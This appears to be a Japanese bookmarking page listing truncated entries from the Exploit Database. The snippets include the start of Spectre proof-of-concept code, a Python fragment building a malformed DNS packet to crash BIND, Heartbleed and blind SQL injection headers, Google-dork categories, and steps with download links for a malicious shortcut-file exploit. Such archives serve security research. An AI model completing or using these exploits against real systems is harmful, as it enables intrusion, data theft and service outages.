サクサク読めて、アプリ限定の機能も多数!
トップへ戻る
アメリカ大統領選
www.exploit-db.com
/* EDB Note: - https://spectreattack.com/ - https://spectreattack.com/spectre.pdf - https://googleprojectzero.blogspot.co.at/2018/01/reading-privileged-memory-with-side.html */ #include <stdio.h> #include <stdlib.h> #include <stdint.h> #ifdef _MSC_VER #include <intrin.h> /* for rdtscp and clflush */ #pragma optimize("gt",on) #else #include <x86intrin.h> /* for rdtscp and clflush */ #endif /*******
import socket import struct TARGET = ('192.168.200.10', 53) Q_A = 1 Q_TSIG = 250 DNS_MESSAGE_HEADERLEN = 12 def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512): query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01" sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 tsig_rr = build_tsig_rr(sweet_spot) return query_A + tsig_rr def int16(n): re
Archived Shellcode for various Operating Systems and Architectures
The Exploit Database is maintained by OffSec, an information security training company that provides various Information Security Certifications as well as high end penetration testing services. The Exploit Database is a non-profit project that is provided as a public service by OffSec. The Exploit Database is a CVE compliant archive of public exploits and corresponding vulnerable software, develo
# Title: Methods of quick exploitation of blind SQL Injection # Date: January 25th, 2010 # Author: Dmitry Evteev (Positive Technologies Research Lab) # Contacts: http://devteev.blogspot.com/ (Russian); http://www.ptsecurity.com/ In this paper, the quickest methods of Blind SQL Injection (error-based) exploitation are collected and considered by examples of several widespread databases. ---=[ 0x01
#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') opt
Footholds (79) Examples of queries that can help an attacker gain a foothold into a web server Sensitive Directories (176) Googles collection of web sites sharing sensitive directories. The files contained in here will vary from sensitive to über-secret!
From: http://www.ivanlef0u.tuxfamily.org/?p=411 1. Unzip the files in 'C: \'. Start a DbgView or paste a KD to your VM. 2. Rename 'suckme.lnk_' to 'suckme.lnk' and let the magic do the rest of shell32.dll. 3. Look at your logs. http://ivanlef0u.nibbles.fr/repo/suckme.rar https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14403.rar (suckme.rar) Tested under XP SP3. kd>
このページを最初にブックマークしてみませんか?
『Exploits Database by Offensive Security』の新着エントリーを見る
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
